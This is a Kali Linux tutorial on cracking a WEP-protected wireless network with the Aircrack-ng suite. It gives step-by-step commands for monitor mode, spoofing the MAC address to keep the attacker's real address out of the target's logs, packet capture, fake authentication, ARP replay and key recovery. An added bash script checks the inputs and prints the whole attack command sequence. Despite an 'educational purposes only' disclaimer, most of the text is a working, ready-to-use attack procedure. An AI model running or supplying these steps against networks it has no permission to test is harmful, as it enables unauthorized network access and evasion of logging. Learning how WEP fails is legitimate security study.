Wired Equivalent Privacy, or WEP as it's commonly referred to, has been around since 1999 and is an older security standard that was used to secure wireless networks. In 2003, WEP was replaced by WPA and later by WPA2. Because more secure protocols are available, WEP encryption is rarely used today. As a matter of fact, it is highly recommended that you never use WEP encryption to secure your network! There are many known ways to exploit WEP encryption, and we will explore one of them in this tutorial. We will use the AirCrack suite to crack a WEP key. The AirCrack suite (or Aircrack-ng, as it is properly called) is a set of WEP and WPA key cracking tools that captures network packets, analyzes them, and uses this data to recover the WEP key.
Caution:
This tutorial is intended for educational purposes only. Hacking into another person's network without permission is illegal, so we are not responsible for what you do with this. Obey the law.
Requirements
Basic experience with the Kali terminal window is required, as is a supported wireless card configured for packet injection. Packet injection means the card and driver can transmit arbitrary crafted frames; in our case we inject frames into an already established connection between two parties. Please ensure your wireless card allows packet injection, as this is not something that all wireless cards support.
How to do it...
Let's begin the process of using AirCrack to crack a network session secured by WEP.
1. Open a terminal window and bring up a list of wireless network interfaces:
  airmon-ng
2. Under the Interface column, select one of your interfaces. In this case, we will use wlan0. If you have a different interface, such as wlan1, please substitute it at every location where wlan0 is mentioned. Note that airmon-ng creates a separate monitor-mode interface when it starts (mon0 on older versions, wlan0mon on newer ones); the capture and injection commands below should be run on that monitor interface if your version reports one.
3. Next, we need to stop monitor mode on wlan0 (if it was running) and take the interface down so that we can change its MAC address in the next step:
  airmon-ng stop wlan0
  ifconfig wlan0 down
4. Next, we change the MAC address of our interface. Since the MAC address of your card identifies you on any network it joins, changing it keeps your true MAC address out of the target's logs. In this case, we will use 00:11:22:33:44:55. Remember this value: the -h option we pass to aireplay-ng later must match the address the interface actually has, or the fake authentication will fail.
  macchanger --mac 00:11:22:33:44:55 wlan0
5. Now we put the interface back into monitor mode. Note the name of the monitor interface that airmon-ng reports (for example mon0 or wlan0mon); if it differs from wlan0, use that name in the remaining commands.
   airmon-ng start wlan0
6. Next, we use airodump-ng to locate the available wireless networks nearby:
  airodump-ng wlan0
7. A listing of available networks will begin to appear. Once you find the one you want to attack, press Ctrl + C to stop the scan. Highlight the MAC address in the BSSID column, right-click, and select copy. Also make note of the channel the network is transmitting on, which you will find in the CH column. In this case, the channel is 10. The ENC column should read WEP; this attack does not apply to WPA or WPA2 networks.
8. Now we run airodump-ng again, restricted to the selected BSSID, and write the captured packets to a file. We will utilize the following options:
-c allows us to select our channel. In this case, we use 10.
-w allows us to select the file name prefix for the capture. In this case, we have chosen wirelessattack; airodump-ng appends a sequence number and extension, so the first capture file will be wirelessattack-01.cap.
--bssid allows us to select our BSSID. In this case, we will paste 09:AC:90:AB:78 from the clipboard. (This value is the tutorial's placeholder and is one octet short; a real BSSID has six colon-separated octets, so paste the full address airodump-ng showed you.)
  airodump-ng -c 10 -w wirelessattack --bssid 09:AC:90:AB:78 wlan0
9. airodump-ng takes over this terminal window and keeps updating its output, including the #Data column that counts captured data packets. Leave this window open.
10. Open another terminal window. To associate with the access point, we run aireplay-ng in fake authentication mode (-1; the following 0 means a single authentication with no reassociation delay). The command has the following syntax:
  aireplay-ng -1 0 -a [BSSID] -h [our chosen MAC address] -e [ESSID] [Interface]
  aireplay-ng -1 0 -a 09:AC:90:AB:78 -h 00:11:22:33:44:55 -e backtrack wlan0
Here the network's name (ESSID) is backtrack. Look for "Association successful" in the output before continuing.
11. Next, we generate traffic so that we have data to capture. We use aireplay-ng again, this time in ARP request replay mode (-3), which captures an ARP request from the network and retransmits it so that the access point emits new packets, each carrying a fresh initialization vector (IV):
  aireplay-ng -3 -b [BSSID] -h [our chosen MAC address] [Interface]
  aireplay-ng -3 -b 09:AC:90:AB:78 -h 00:11:22:33:44:55 wlan0
12. Your screen will begin to fill with traffic. Let this process run for a minute or two until we have enough information to run the crack. Watch the #Data column in the airodump-ng window: the statistical attack aircrack-ng uses needs on the order of tens of thousands of captured IVs, and the more you collect, the better its chances.
13. Finally, we run aircrack-ng against the capture file to recover the WEP key. The file name carries the -01 suffix that airodump-ng added; you can run this while the capture is still going and simply rerun it as more IVs accumulate:
  aircrack-ng -b 09:AC:90:AB:78 wirelessattack-01.cap
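The following helper script is an added example and is not part of the original tutorial or the Aircrack-ng project. It ties steps 8 to 13 together: it validates the BSSID and MAC (six hex octets, which the placeholder above is not), works out which interface is in monitor mode from the output of iw dev, and prints the exact command sequence, including the aireplay-ng -9 injection test and the -01 capture file name. The interface, BSSID, ESSID and MAC values used in it are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original tutorial or Aircrack-ng): validate the
# inputs for the WEP procedure above and print the command sequence to run.
# Interface, BSSID, ESSID and MAC values are placeholders.
set -u

# Return 0 if $1 is a well-formed MAC address / BSSID: six colon-separated
# hex octets. The tutorial's placeholder 09:AC:90:AB:78 has only five.
is_valid_bssid() {
    printf '%s\n' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

# Given the text of `iw dev`, print the first interface whose type is
# monitor (e.g. mon0 or wlan0mon) and return 0; print nothing and return 1
# if no monitor-mode interface exists.
monitor_iface_from_iw() {
    printf '%s\n' "$1" | awk '
        $1 == "Interface" { iface = $2 }
        $1 == "type" && $2 == "monitor" && iface != "" { print iface; found = 1; exit }
        END { exit found ? 0 : 1 }'
}

# Print the command sequence for steps 8 to 13, one command per line.
# Arguments: monitor interface, target BSSID, channel, ESSID,
#            our (spoofed) MAC, airodump-ng capture prefix.
# Returns 1 and prints nothing on stdout if an address or channel is malformed.
wep_attack_commands() {
    local iface="$1" bssid="$2" chan="$3" essid="$4" mac="$5" prefix="$6"
    is_valid_bssid "$bssid" || { echo "malformed BSSID: $bssid" >&2; return 1; }
    is_valid_bssid "$mac"   || { echo "malformed MAC: $mac" >&2; return 1; }
    case $chan in ''|*[!0-9]*) echo "channel must be numeric: $chan" >&2; return 1 ;; esac
    # airodump-ng and the -3 replay must run at the same time in two terminals;
    # aircrack-ng reads the -01 file that airodump-ng creates from the prefix.
    cat <<EOF
aireplay-ng -9 $iface
airodump-ng -c $chan -w $prefix --bssid $bssid $iface
aireplay-ng -1 0 -a $bssid -h $mac -e $essid $iface
aireplay-ng -3 -b $bssid -h $mac $iface
aircrack-ng -b $bssid ${prefix}-01.cap
EOF
}

# Only print a plan for a live system when explicitly asked:
#   WEP_DEMO=1 ./wep_plan.sh <bssid> <channel> <essid> [prefix]
# so that sourcing this file just defines the functions.
if [ "${WEP_DEMO:-0}" = 1 ]; then
    [ $# -ge 3 ] || { echo "usage: WEP_DEMO=1 $0 <bssid> <channel> <essid> [prefix]" >&2; exit 2; }
    mon=$(monitor_iface_from_iw "$(iw dev 2>/dev/null)") || {
        echo "no monitor-mode interface found; run airmon-ng start wlan0 first" >&2; exit 1; }
    mac=$(cat "/sys/class/net/$mon/address")   # the address aireplay-ng -h must match
    wep_attack_commands "$mon" "$1" "$2" "$3" "$mac" "${4:-wirelessattack}"
fi
```

The script reads the interface's current MAC from /sys/class/net so that the -h value always matches what macchanger set; the fake authentication in step 10 is rejected by the access point when the two differ.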
That's it! We used the AirCrack suite to crack the WEP key of a wireless network. Aircrack-ng is one of the most popular programs for cracking WEP. It works by gathering packets from a WEP-protected wireless connection and then statistically analyzing the initialization vectors in them to recover the WEP key. We began by using airmon-ng to select our interface and put it into monitor mode. Next, we changed our MAC address, which allowed us to change our identity on the network, and then searched for available wireless networks to attack using airodump-ng. Once we found the network we wanted to attack, we used aireplay-ng to fake-authenticate our machine with the access point. We concluded by replaying ARP requests to generate traffic and then ran aircrack-ng over the captured CAP file to recover the wireless key; this is a statistical attack on WEP's weak use of RC4, not a brute-force search of the key space.
